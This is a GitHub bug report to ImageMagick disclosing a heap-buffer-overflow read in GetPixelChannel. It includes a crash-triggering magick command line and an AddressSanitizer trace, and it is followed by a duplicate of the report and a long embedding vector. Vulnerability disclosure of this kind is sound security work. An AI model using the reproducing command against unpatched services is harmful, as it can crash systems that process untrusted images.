### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There's a heap-buffer-overflow at MagickCore/pixel-accessor.h:116:10 in GetPixelChannel. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> run_cmd: `magick -seed 0 "(" magick:netscape -monochrome ")" "(" magick:netscape +repage ")" -geometry 433%-80-57 -adjoin -evaluate-sequence Median tmp` Here's ASAN log. ``` ==30168==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7febb7ba1400 at pc 0x7febc5808632 bp 0x7ffd269baff0 sp 0x7ffd269bafe8 READ of size 4 at 0x7febb7ba1400 thread T0 #0 0x7febc5808631 in GetPixelChannel ./MagickCore/pixel-accessor.h:116:10 #1 0x7febc5805ff6 in EvaluateImages MagickCore/statistic.c:587:33 #2 0x7febc4e1a5bf in CLIListOperatorImages MagickWand/operation.c:4084:22 #3 0x7febc4e2435e in CLIOption MagickWand/operation.c:5279:14 #4 0x7febc4c65a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #5 0x7febc4c66d0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #6 0x7febc4cb0ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #7 0x526f95 in MagickMain utilities/magick.c:149:10 #8 0x5268e1 in main utilities/magick.c:180:10 #9 0x7febbf727b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #10 0x41b069 in _start (install/bin/magick+0x41b069) 0x7febb7ba1400 is located 0 bytes to the right of 248832-byte region [0x7febb7b64800,0x7febb7ba1400) allocated by thread T0 here: #0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200) #1 0x7febc569fed6 in AcquireAlignedMemory MagickCore/memory.c:265:7 #2 0x7febc53e861c in OpenPixelCache MagickCore/cache.c:3728:46 #3 0x7febc53ee901 in GetImagePixelCache MagickCore/cache.c:1754:18 #4 0x7febc53f4bc9 in SyncImagePixelCache MagickCore/cache.c:5488:28 #5 0x7febc5653831 in SetImageStorageClass MagickCore/image.c:2627:10 #6 0x7febc54187e2 in AcquireImageColormap MagickCore/colormap.c:144:10 #7 0x7febc575d137 in AssignImageColors MagickCore/quantize.c:514:7 #8 0x7febc5753f38 in QuantizeImage MagickCore/quantize.c:2724:14 #9 0x7febc53ae56c in SetImageType MagickCore/attribute.c:1495:14 #10 0x7febc4e0cace in CLISimpleOperatorImage MagickWand/operation.c:2792:18 #11 0x7febc4dfec78 in CLISimpleOperatorImages MagickWand/operation.c:3685:12 #12 0x7febc4e24315 in CLIOption MagickWand/operation.c:5273:16 #13 0x7febc4c65a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #14 0x7febc4c66d0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #15 0x7febc4cb0ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #16 0x526f95 in MagickMain utilities/magick.c:149:10 #17 0x5268e1 in main utilities/magick.c:180:10 #18 0x7febbf727b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) SUMMARY: AddressSanitizer: heap-buffer-overflow ./MagickCore/pixel-accessor.h:116:10 in GetPixelChannel ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-21 https://imagemagick.org - Environment (Operating system, version and so on): Description: Ubuntu 18.04.1 LTS Release: 18.04 Codename: bionic - Additional information: CC=clang-7 CXX=clang++-7 ./configure --disable-openmp <!-- Thanks for reporting the issue to ImageMagick! -->
heap-buffer-overflow at MagickCore/pixel-accessor.h:116:10 in GetPixelChannel
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1610/comments
6
2019-06-21T06:05:24
2019-10-25T13:50:32Z
https://github.com/ImageMagick/ImageMagick/issues/1610
459,025,122
1,610
true
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : heap-buffer-overflow at MagickCore/pixel-accessor.h:116:10 in GetPixelChannel Issue date: --- start body --- ### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There's a heap-buffer-overflow at MagickCore/pixel-accessor.h:116:10 in GetPixelChannel. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> run_cmd: `magick -seed 0 "(" magick:netscape -monochrome ")" "(" magick:netscape +repage ")" -geometry 433%-80-57 -adjoin -evaluate-sequence Median tmp` Here's ASAN log. ``` ==30168==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7febb7ba1400 at pc 0x7febc5808632 bp 0x7ffd269baff0 sp 0x7ffd269bafe8 READ of size 4 at 0x7febb7ba1400 thread T0 #0 0x7febc5808631 in GetPixelChannel ./MagickCore/pixel-accessor.h:116:10 #1 0x7febc5805ff6 in EvaluateImages MagickCore/statistic.c:587:33 #2 0x7febc4e1a5bf in CLIListOperatorImages MagickWand/operation.c:4084:22 #3 0x7febc4e2435e in CLIOption MagickWand/operation.c:5279:14 #4 0x7febc4c65a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #5 0x7febc4c66d0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #6 0x7febc4cb0ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #7 0x526f95 in MagickMain utilities/magick.c:149:10 #8 0x5268e1 in main utilities/magick.c:180:10 #9 0x7febbf727b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #10 0x41b069 in _start (install/bin/magick+0x41b069) 0x7febb7ba1400 is located 0 bytes to the right of 248832-byte region [0x7febb7b64800,0x7febb7ba1400) allocated by thread T0 here: #0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200) #1 0x7febc569fed6 in AcquireAlignedMemory MagickCore/memory.c:265:7 #2 0x7febc53e861c in OpenPixelCache MagickCore/cache.c:3728:46 #3 0x7febc53ee901 in GetImagePixelCache MagickCore/cache.c:1754:18 #4 0x7febc53f4bc9 in SyncImagePixelCache MagickCore/cache.c:5488:28 #5 0x7febc5653831 in SetImageStorageClass MagickCore/image.c:2627:10 #6 0x7febc54187e2 in AcquireImageColormap MagickCore/colormap.c:144:10 #7 0x7febc575d137 in AssignImageColors MagickCore/quantize.c:514:7 #8 0x7febc5753f38 in QuantizeImage MagickCore/quantize.c:2724:14 #9 0x7febc53ae56c in SetImageType MagickCore/attribute.c:1495:14 #10 0x7febc4e0cace in CLISimpleOperatorImage MagickWand/operation.c:2792:18 #11 0x7febc4dfec78 in CLISimpleOperatorImages MagickWand/operation.c:3685:12 #12 0x7febc4e24315 in CLIOption MagickWand/operation.c:5273:16 #13 0x7febc4c65a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #14 0x7febc4c66d0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #15 0x7febc4cb0ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #16 0x526f95 in MagickMain utilities/magick.c:149:10 #17 0x5268e1 in main utilities/magick.c:180:10 #18 0x7febbf727b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) SUMMARY: AddressSanitizer: heap-buffer-overflow ./MagickCore/pixel-accessor.h:116:10 in GetPixelChannel ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-21 https://imagemagick.org - Environment (Operating system, version and so on): Description: Ubuntu 18.04.1 LTS Release: 18.04 Codename: bionic - Additional information: CC=clang-7 CXX=clang++-7 ./configure --disable-openmp <!-- Thanks for reporting the issue to ImageMagick! --> --- end body ---
4,185
[ -0.03732723370194435, -0.0074003878980875015, -0.004310116171836853, -0.0035307712387293577, 0.03399299085140228, 0.0005040328251197934, -0.009880738332867622, 0.03822178393602371, -0.012584726326167583, 0.018690723925828934, -0.010788843967020512, -0.013797793537378311, 0.030767181888222694, 0.0309569351375103, 0.0064753396436572075, 0.00447953911498189, -0.02735161781311035, 0.026064004749059677, -0.017701294273138046, -0.004533754196017981, 0.007271626964211464, -0.03412852808833122, -0.03239364176988602, 0.045459527522325516, -0.029737090691924095, 0.015844421461224556, -0.0029801472555845976, 0.010870167054235935, 0.00010160073725273833, 0.014624576084315777, 0.008979409001767635, 0.023380346596240997, 0.0016696617240086198, 0.02775823324918747, 0.02142859622836113, -0.0035544903948903084, 0.01365547813475132, 0.0632692500948906, 0.012733818031847477, 0.025033913552761078, 0.002187248319387436, -0.04261322319507599, 0.002126256236806512, 0.002471878658980131, -0.02518300525844097, -0.016074836254119873, 0.00018678864580579102, -0.030740072950720787, -0.04288430139422417, 0.024017376825213432, 0.028246169909834862, -0.003961105365306139, -0.019598830491304398, -0.04491737484931946, 0.000025426656065974385, -0.03312554582953453, 0.039712704718112946, 0.04039039835333824, 0.013960438780486584, -0.0025464247446507215, -0.003713747952133417, 0.023854730650782585, 0.010754959657788277, 0.01585797406733036, -0.01833832450211048, -0.016007065773010254, 0.0014960033586248755, 0.0041000316850841045, -0.0168609581887722, 0.020615367218852043, -0.008322048000991344, -0.019598830491304398, 0.032556287944316864, 0.03567366674542427, 0.008823540061712265, 0.02572515793144703, 0.030414782464504242, 0.01381134707480669, -0.06554629653692245, 0.02469506859779358, -0.06896185874938965, 0.01612905040383339, -0.04147470369935036, 0.05155874788761139, 0.05334785208106041, 0.003490109695121646, -0.015708882361650467, -0.06901607662439346, -0.05462191253900528, -0.014001100324094296, -0.005929798353463411, 0.018582293763756752, 0.008511802181601524, 0.003176677506417036, 0.02424779161810875, 0.020967766642570496, -0.005255495198071003, -0.018907584249973297, -0.037164587527513504, 0.023475224152207375, -0.014461930841207504, -0.00310043734498322, 0.020859336480498314, 0.02717541716992855, 0.012754148803651333, 0.018419647589325905, -0.024776391685009003, -0.03412852808833122, 0.03564655780792236, 0.12079168111085892, 0.0026599380653351545, -0.013614816591143608, -0.014095976948738098, 0.010741406120359898, 0.005560456309467554, 0.032149672508239746, 0.008010310120880604, 0.015505575574934483, -0.012781256809830666, -0.011425874195992947, -0.03431828320026398, -0.03518572822213173, -0.003193619893863797, 0.001148686627857387, -0.02916783094406128, 0.009433461353182793, 0.0026328302919864655, -0.035212837159633636, -0.008450809866189957, -0.020764458924531937, -0.022689102217555046, -0.029249152168631554, 0.021821657195687294, -0.026633264496922493, -0.02521011419594288, -0.030848504975438118, -0.01957172155380249, 0.04548663645982742, 0.007630803156644106, -0.005919632967561483, -0.06836549192667007, -0.04377885162830353, 0.01682029664516449, 0.024532422423362732, 0.004394827410578728, 0.013377624563872814, -0.015803759917616844, 0.007230965420603752, -0.024396883323788643, -0.017592864111065865, -0.001320650801062584, 0.014570361003279686, 0.01606128178536892, -0.011724058538675308, 0.047790784388780594, 0.0019280315609648824, 0.03917055204510689, 0.03385745361447334, -0.03502308204770088, -0.016495004296302795, -0.012632164172828197, -0.04480894282460213, 0.0009360609692521393, -0.009812968783080578, 0.011805380694568157, -0.018758492544293404, -0.006390628404915333, 0.011500420048832893, -0.008681224659085274, 0.030631642788648605, 0.016982942819595337, 0.016657650470733643, 0.0029682875610888004, -0.0009021764271892607, -0.04800764471292496, 0.011391988955438137, -0.0009945118799805641, 0.012069680728018284, -0.004486315883696079, -0.02071024291217327, 0.0031377102714031935, -0.01465168409049511, -0.00437788525596261, 0.00046506559010595083, 0.03453514352440834, -0.019517507404088974, 0.017633525654673576, -0.040498826652765274, 0.000916577351745218, 0.014800775796175003, -0.00016264589794445783, -0.026091111823916435, 0.016156159341335297, -0.042152393609285355, 0.03209545463323593, 0.0018890643259510398, -0.022174056619405746, -0.038032032549381256, 0.02001899853348732, -0.018758492544293404, 0.011270005255937576, -0.014570361003279686, -0.03057742863893509, -0.011466535739600658, -0.007346172817051411, 0.02504746802151203, -0.036378465592861176, 0.03925187513232231, 0.03133644163608551, -0.010944712907075882, -0.036270033568143845, -0.012794810347259045, 0.009901069104671478, -0.011371659114956856, -0.03941452130675316, 0.019273538142442703, -0.005858640652149916, 0.003798459190875292, -0.02473573014140129, -0.01141909696161747, 0.005604506470263004, -0.012171334587037563, 0.00014888029545545578, -0.03705615550279617, -0.024545976892113686, -0.013906223699450493, -0.010571982711553574, -0.017050711438059807, -0.04415835812687874, -0.00891163945198059, -0.0003458342980593443, -0.019531061872839928, 0.016657650470733643, -0.003186842892318964, 0.016562772914767265, -0.012374641373753548, -0.010307683609426022, -0.0065973238088190556, -0.01637301966547966, 0.027541371062397957, 0.004991195630282164, 0.015424252487719059, -0.02422068454325199, -0.005289379972964525, 0.046245649456977844, 0.036026064306497574, -0.03453514352440834, -0.017619971185922623, -0.03288157656788826, 0.019802138209342957, 0.007014104165136814, -0.024613745510578156, -0.0036798634100705385, -0.002368530724197626, -0.00479127699509263, -0.015695327892899513, 0.020967766642570496, -0.004113585688173771, -0.010863389819860458, -0.0045439195819199085, 0.04082411900162697, 0.02211984060704708, -0.008647340349853039, 0.024125806987285614, 0.032176777720451355, -0.005448637530207634, -0.00703443493694067, 0.010314459912478924, 0.0007306358311325312, -0.012801587581634521, 0.009670653380453587, -0.03206834942102432, -0.01885337010025978, -0.05451348051428795, -0.023922499269247055, 0.0030631644185632467, 0.024478206411004066, -0.000008246125617006328, 0.0029462624806910753, 0.008898085914552212, 0.018514523282647133, 0.01355382427573204, -0.02308216318488121, 0.026538388803601265, 0.015342929400503635, -0.003825566964223981, 0.037273015826940536, -0.010843059979379177, -0.01702360436320305, -0.018460309132933617, -0.01068041380494833, 0.011581743136048317, -0.04076990485191345, 0.004669292364269495, 0.015844421461224556, -0.005099626258015633, -0.005272437818348408, -0.017592864111065865, -0.017714848741889, 0.0020008832216262817, -0.027338063344359398, -0.037408556789159775, -0.0021431983914226294, 0.0022719597909599543, -0.01231364905834198, 0.01713203452527523, -0.028327492997050285, 0.024098699912428856, 0.004418546799570322, -0.01209001149982214, 0.050582870841026306, -0.03876393660902977, 0.003618871094658971, -0.035429697483778, -0.03797781467437744, -0.013133656233549118, 0.0025515074376016855, 0.007786672096699476, 0.0011325913947075605, 0.0015459831338375807, -0.03092982806265354, -0.042152393609285355, -0.011818935163319111, 0.03453514352440834, -0.00552996015176177, 0.02697211131453514, -0.018650062382221222, 0.0388723686337471, -0.09211178869009018, 0.019422629848122597, -0.01785038597881794, -0.0350772961974144, -0.02527788281440735, -0.017701294273138046, 0.03426406905055046, -0.047275740653276443, -0.022892409935593605, 0.04133916273713112, 0.019937675446271896, 0.03732723370194435, -0.02679591067135334, 0.022865300998091698, -0.011107359081506729, -0.03992956504225731, 0.005845086649060249, -0.018148571252822876, -0.00155021867249161, 0.003398621454834938, 0.012632164172828197, 0.0015163341304287314, 0.0008225477067753673, 0.042287930846214294, 0.012740595266222954, 0.04003799706697464, 0.0077256797812879086, 0.030279243364930153, -0.03800492361187935, -0.005191114731132984, 0.001714558806270361, -0.03209545463323593, -0.005316487513482571, -0.0536460354924202, -0.006122940219938755, -0.003224116051569581, 0.01260505709797144, 0.009020070545375347, -0.014990529976785183, -0.01490920688956976, -0.033450838178396225, -0.011703727766871452, -0.0280293095856905, 0.07167262583971024, -0.03683929517865181, 0.02274331822991371, -0.03862839937210083, -0.02415291592478752, 0.016278143972158432, 0.015261606313288212, -0.033965885639190674, 0.004774334840476513, -0.00927081611007452, 0.023692084476351738, 0.03879104554653168, -0.03865550830960274, 0.031553301960229874, 0.02046627551317215, -0.014678792096674442, 0.01995122991502285, 0.006285585928708315, -0.029438907280564308, -0.04627275466918945, 0.030143706128001213, -0.02274331822991371, -0.049932289868593216, 0.010212806984782219, 0.0333695150911808, 0.00037971886922605336, -0.033830344676971436, 0.05394422262907028, -0.04350777715444565, 0.017254019156098366, -0.027053434401750565, 0.011032813228666782, 0.028327492997050285, -0.016969388350844383, 0.02480349875986576, 0.020059660077095032, -0.01923287659883499, 0.01936841569840908, 0.0020771236158907413, 0.020479828119277954, 0.0018450143979862332, -0.05182982608675957, 0.008830316364765167, 0.022363809868693352, -0.008111963979899883, 0.008172956295311451, 0.0017137116519734263, -0.013736801221966743, 0.006068724673241377, -0.02741938643157482, 0.0039678821340203285, -0.026633264496922493, 0.027704017236828804, -0.004350777715444565, 0.005031857173889875, -0.014733007177710533, 0.018514523282647133, 0.003903501434251666, -0.00933858472853899, -0.03285447135567665, -0.010965043678879738, -0.005946740508079529, -0.005868806038051844, -0.016427235677838326, -0.00975197646766901, -0.03692061826586723, -0.032420746982097626, -0.02205207198858261, -0.01554623618721962, 0.008505024947226048, 0.027161864563822746, -0.03667664900422096, -0.024749282747507095, -0.029005184769630432, -0.03515861928462982, -0.02259422466158867, 0.005807813722640276, -0.0028191953897476196, -0.015952851623296738, -0.04158313199877739, 0.02652483433485031, 0.00600095558911562, -0.025155898183584213, 0.030468996614217758, -0.011337773874402046, -0.02359720878303051, -0.004872600082308054, 0.02077801339328289, 0.009399577043950558, 0.0003970846883021295, 0.015573344193398952, -0.0036019289400428534, -0.02838170900940895, -0.004113585688173771, 0.0294117983430624, 0.006993773393332958, -0.005716325249522924, 0.003073329571634531, 0.00047989009181037545, 0.016291696578264236, 0.039333198219537735, 0.015017637051641941, -0.012022241950035095, -0.022201163694262505, 0.01916510798037052, -0.015139621682465076, 0.009704538621008396, 0.008904862217605114, -0.07281114161014557, 0.016562772914767265, -0.04760103300213814, -0.039848241955041885, 0.029357584193348885, 0.044456545263528824, -0.01438060775399208, -0.012286541983485222, 0.009480900131165981, -0.03889947757124901, -0.006421124096959829, 0.008898085914552212, 0.004940369166433811, 0.006431289482861757, -0.03917055204510689, -0.01329630147665739, 0.00625170161947608, -0.02800220064818859, -0.009636769071221352, 0.03239364176988602, 0.0087693240493536, -0.0012418691767379642, -0.0043168929405510426, 0.015519129112362862, -0.014285731129348278, 0.00401532044634223, -0.053781576454639435, -0.03898080065846443, 0.01515317615121603, -0.033830344676971436, -0.021577687934041023, 0.018148571252822876, -0.026321526616811752, 0.02645706571638584, -0.03526705130934715, 0.03364059329032898, -0.01009759958833456, 0.036026064306497574, -0.02207917906343937, 0.016725419089198112, 0.010876944288611412, -0.002676880219951272, -0.019449738785624504, 0.023990269750356674, 0.035890527069568634, 0.050311796367168427, -0.0024447711184620857, 0.027975093573331833, -0.006780300755053759, 0.01240174937993288, -0.021970748901367188, 0.027541371062397957, -0.018216339871287346, -0.02301439456641674, 0.02731095626950264, -0.008572793565690517, 0.005557068157941103, -0.03683929517865181, -0.009541892446577549, 0.012117118574678898, -0.022648440673947334, -0.005834921263158321, 0.0557333268225193, -0.007434272672981024, -0.005702771712094545, -0.04461919143795967, 0.01968015357851982, -0.024030931293964386, 0.03277314826846123, 0.004825161304324865, -0.0006107692024670541, 0.009101392701268196, -0.025942020118236542, 0.028869645670056343, 0.015885083004832268, 0.0010461858473718166, -0.003845897736027837, 0.004438877571374178, -0.005116568878293037, 0.009928176179528236, 0.007251296192407608, 0.03082139603793621, -0.01073462888598442, 0.018202785402536392, 0.011242897249758244, -0.011859596706926823, -0.01657632738351822, -0.00927081611007452, 0.02965576760470867, -0.04518844932317734, -0.006854846607893705, 0.025955574586987495, -0.005431694909930229, 0.008674447424709797, -0.0035917635541409254, -0.018934693187475204, 0.022133395075798035, -0.003798459190875292, -0.01892113871872425, -0.011466535739600658, -0.022824639454483986, 0.0137571319937706, -0.031417764723300934, 0.021862318739295006, 0.013357293792068958, 0.020412059500813484, -0.011154797859489918, 0.012808363884687424, 0.012727040797472, -0.013973993249237537, -0.02332613244652748, 0.0005421529640443623, 0.03171594813466072, -0.01764708012342453, 0.003961105365306139, 0.011785049922764301, -0.018392540514469147, 0.016345912590622902, -0.004147470463067293, 0.011791827157139778, -0.014258623123168945, -0.017999479547142982, 0.015315821394324303, 0.004936980549246073, -0.04274876043200493, -0.0030580817256122828, -0.00200427183881402, 0.013106548227369785, 0.004028874449431896, 0.0029411797877401114, 0.010416113771498203, 0.021821657195687294, 0.027148310095071793, 0.023366793990135193, 0.0015087100910022855, 0.02455952949821949, -0.001454494777135551, 0.007237742189317942, 0.01439416129142046, -0.027839554473757744, -0.003696805564686656, 0.011148020625114441, -0.046489618718624115, 0.009291146881878376, 0.025359205901622772, 0.013872339390218258, 0.012977787293493748, -0.030387673527002335, -0.007502041757106781, -0.006268643774092197, -0.013662255369126797, -0.006526166573166847, 0.03125511854887009, 0.01572243683040142, -0.025860697031021118, -0.01946329139173031, 0.016738973557949066, 0.0027480379212647676, -0.006905673537403345, -0.029005184769630432, 0.0016730502247810364, -0.02628086507320404, -0.0022617944050580263, -0.02827327698469162, -0.0013909612316638231, -0.018731385469436646, 0.0014960033586248755, 0.0023566712625324726, 0.0018772046314552426, 0.01650855876505375, 0.02668748050928116, -0.04090544208884239, 0.004482927266508341, 0.0031224621925503016, 0.016942281275987625, 0.0051064034923911095, -0.011330997571349144, 0.03618871048092842, 0.05855252221226692, -0.023814069107174873, -0.02087288908660412, -0.011737612076103687, -0.023244809359312057, -0.03724591061472893, 0.004723507910966873, 0.03751698508858681, -0.00563161401078105, -0.020723797380924225, -0.04144759476184845, 0.022092733532190323, 0.026064004749059677, 0.013065886683762074, -0.006034840364009142, -0.0017111703054979444, 0.02827327698469162, -0.02180810272693634, -0.021320166066288948, 0.016969388350844383, 0.004991195630282164, -0.025928465649485588, 0.042775869369506836, 0.01785038597881794, -0.0012367864837870002, 0.004838715307414532, 0.008450809866189957, -0.0220114104449749, -0.002939485711976886, 0.020059660077095032, 0.009318253956735134, -0.00844403263181448, -0.03618871048092842, 0.025196559727191925, -0.018772047013044357, -0.005099626258015633, 0.025155898183584213, 0.006468562874943018, -0.011012482456862926, 0.011391988955438137, -0.004452431108802557, -0.009331808425486088, -0.026375742629170418, -0.028300385922193527, 0.002620970830321312, 0.003717136336490512, 0.016074836254119873, 0.012354310601949692, 0.037788063287734985, -0.006580381654202938, 0.016400126740336418, -0.02111685834825039, 0.006136494223028421, -0.02380051650106907, 0.021957196295261383, -0.04068858176469803, 0.019585276022553444, -0.003923831973224878, -0.01068041380494833, -0.011398766189813614, -0.006566828116774559, 0.014814330264925957, 0.001338440109975636, -0.009955284185707569, -0.012530510313808918, -0.02865278534591198, -0.04936302825808525, 0.000001148236606240971, 0.0004485468671191484, 0.005692606326192617, 0.004164412617683411, 0.04480894282460213, 0.015451359562575817, 0.00008772924775257707, -0.020547598600387573, -0.006912450306117535, 0.002636218909174204, 0.0013672420755028725, -0.01939552277326584, 0.018216339871287346, -0.006072113290429115, 0.018894031643867493, 0.007576588075608015, 0.020032553002238274, -0.024749282747507095, 0.028625676408410072, -0.03247496485710144, 0.015451359562575817, -0.01241530291736126, 0.005895913578569889, 0.005702771712094545, -0.016251035034656525, 0.024600191041827202, -0.013018447905778885, 0.005848475266247988, 0.021780995652079582, -0.010605867952108383, -0.021591242402791977, -0.007800226099789143, 0.004632019437849522, -0.024952590465545654, 0.022540010511875153, -0.019070230424404144, 0.008254279382526875, 0.010300906375050545, -0.007136088330298662, 0.004615077283233404, 0.018975354731082916, 0.018487416207790375, 0.01572243683040142, -0.009731645695865154, 0.02328547090291977, -0.001285071950405836, 0.0026734918355941772, -0.012801587581634521, -0.034860435873270035, -0.0005192809039726853, 0.01630525104701519, -0.004991195630282164, 0.0044456543400883675, 0.021076196804642677, 0.006959888618439436, 0.0416102409362793, -0.019897013902664185, -0.0011935837101191282, -0.04478183761239052, 0.05741399899125099, -0.01006371434777975, -0.0023820847272872925, 0.017796171829104424, -0.0026701034512370825, -0.013391178101301193, 0.0010182310361415148, -0.007461380213499069, -0.009934953413903713, 0.031797271221876144, -0.008850647136569023, -0.028706999495625496, -0.018866922706365585, -0.000009960207535186782, -0.012442410923540592, -0.004557473585009575, -0.030035274103283882, -0.032176777720451355, 0.011046366766095161, -0.02283819392323494, -0.008877755142748356, -0.021238842979073524, -0.043941497802734375, -0.01654922030866146, 0.03391166776418686, -0.02541342005133629, 0.021442150697112083, 0.01988346129655838, 0.007596918381750584, 0.00019928357505705208, 0.011717281304299831, -0.0051301224157214165, -0.026673926040530205, 0.0015044745523482561, -0.02878832258284092, 0.002800558926537633, -0.0006205110112205148, -0.013065886683762074, -0.014990529976785183, -0.011236120015382767, -0.040092211216688156, -0.010632975026965141, -0.010829505510628223, 0.0006632902659475803, 0.007888325490057468, 0.011927365325391293, 0.02008676715195179, -0.019341306760907173, -0.021862318739295006, 0.008593124337494373, 0.0337219163775444, -0.0033647369127720594, 0.021862318739295006, -0.01432639267295599, -0.011452981270849705, -0.030767181888222694, 0.03833021596074104, 0.0020381563808768988, 0.01084983628243208, -0.0032410582061856985, -0.008328825235366821, 0.005750210024416447, -0.025792928412556648, -0.027365172281861305, 0.021252397447824478, 0.0017416664632037282, 0.01116157416254282, 0.013946885243058205, 0.024857714772224426, -0.00630252854898572, 0.011114136315882206, -0.011330997571349144, 0.004621854051947594, -0.01444837637245655, -0.0018009644700214267, 0.004259289242327213, -0.023814069107174873, 0.037273015826940536, -0.007407165132462978, -0.010206029750406742, 0.001833154703490436, 0.047763675451278687, 0.024667959660291672, -0.007203857880085707, -0.007705349009484053, 0.005828144494444132, -0.004469373729079962, -0.019354861229658127, -0.0018805931322276592, 0.0505557656288147, -0.004537142813205719, -0.01547846756875515, -0.01702360436320305, -0.013946885243058205, -0.005462191067636013, 0.00008502906712237746, 0.01695583388209343, -0.004767557606101036, 0.010314459912478924, 0.0014511062763631344, 0.023299023509025574, -0.009948506951332092, -0.02876121550798416, 0.010294130071997643, -0.03865550830960274, -0.01977502927184105, 0.006316082086414099, 0.004618465434759855, -0.005452025681734085, -0.04502580314874649, -0.02576581947505474, 0.03309844061732292, 0.0014655073173344135, -0.024342669174075127, -0.016630543395876884, -0.022797532379627228, -0.021211735904216766, 0.007481710985302925, -0.004777722992002964, 0.006668481510132551, 0.0025735325179994106, -0.009006516076624393, 0.004611688666045666, 0.043805960565805435, -0.003537548240274191, -0.007481710985302925, 0.0012681296793743968, 0.026945002377033234, -0.012015465646982193, -0.00541814137250185, -0.007542703300714493, -0.016698312014341354, 0.004821773152798414, -0.0005459649837575853, -0.005326652899384499, 0.0038696168921887875, 0.013702916912734509, 0.016630543395876884, 0.010795621201395988, -0.014746560715138912, 0.0019314199453219771, -0.011107359081506729, -0.04830583184957504, -0.0319870263338089, 0.009209823794662952, 0.010280575603246689, 0.007441049441695213, 0.003398621454834938, 0.010043383575975895, 0.014868545345962048, 0.010897275060415268, -0.007590141613036394, -0.007834110409021378, -0.02015453763306141, 0.007054765708744526, -0.0343996062874794, -0.0275142639875412, -0.006516001187264919, 0.015939297154545784, 0.02531854435801506, 0.001661190646700561, 0.004449042957276106, 0.009718092158436775, 0.004062758758664131, -0.029872629791498184, -0.016427235677838326, -0.016074836254119873, -0.03505019098520279, 0.00968420784920454, 0.014312838204205036, -0.003795070806518197, -0.016630543395876884, 0.028327492997050285, -0.017714848741889, -0.0002846303104888648, 0.014461930841207504, 0.0006378768594004214, 0.016359465196728706, 0.006427901331335306, -0.04377885162830353, -0.0014426351990550756, -0.007210634648799896, 0.004357554484158754, -0.04386017471551895, 0.004150858614593744, -0.028978075832128525, -0.03437249734997749, 0.004564250353723764, 0.02600978873670101, 0.006028063595294952, 0.023231254890561104, -0.004330446943640709, 0.049335919320583344, 0.0025108458939939737, -0.01489565335214138, -0.022174056619405746, -0.011547858826816082, -0.029737090691924095, -0.0008649034425616264, 0.06630530953407288, -0.0026785745285451412, 0.017118480056524277, -0.02927626110613346, 0.01579020544886589, 0.016603434458374977, -0.02397671528160572, -0.010260244831442833, 0.021442150697112083, 0.011080251075327396, 0.0016493309522047639, -0.042640332132577896, -0.010483883321285248, 0.01816212385892868, -0.03323397785425186, -0.022607779130339622, -0.02854435332119465, -0.00827461015433073, -0.042531900107860565, 0.02892386168241501, 0.028978075832128525, 0.019598830491304398, 0.0004959852667525411, 0.026402849704027176, -0.005370703060179949, 0.01140554342418909, -0.01785038597881794, -0.0010300906142219901, -0.015004083514213562, -0.00678368890658021, 0.036649540066719055, 0.0036629210226237774, 0.0313093326985836, 0.015912190079689026, -0.004476150497794151, 0.00859990157186985, 0.0033630426041781902, 0.043453559279441833, -0.02525077573955059, -0.011961249634623528, -0.020249413326382637, -0.023610761389136314, -0.007752787787467241, 0.018311217427253723, -0.0026904342230409384, 0.0003443518653512001, 0.029574444517493248, 0.004245735704898834, 0.009399577043950558, 0.006329636089503765, 0.014773668721318245, -0.003202090971171856, -0.027094094082713127, 0.0003746361762750894, 0.02066958136856556, -0.024085145443677902, -0.03719169273972511, 0.013323409482836723, 0.04960699751973152, -0.02091355063021183, 0.0010538098867982626, 0.0007115757907740772, -0.015315821394324303, 0.008654116652905941, -0.0002757356269285083, -0.02346166968345642, 0.017186248674988747, -0.023407455533742905, 0.005157229956239462, -0.01141909696161747, 0.021062642335891724, -0.017430217936635017, -0.010138260200619698, -0.002810724312439561, 0.005950129125267267, -0.020615367218852043, 0.006455008871853352, -0.0022312982473522425, -0.01778261736035347, -0.011283558793365955, 0.004618465434759855, -0.019666599109768867, -0.024369776248931885, -0.02122528851032257, 0.006560050882399082, 0.010815951973199844, 0.0018568739760667086, 0.00908106192946434, 0.017525095492601395, 0.015898635610938072, -0.018148571252822876, -0.022661995142698288, 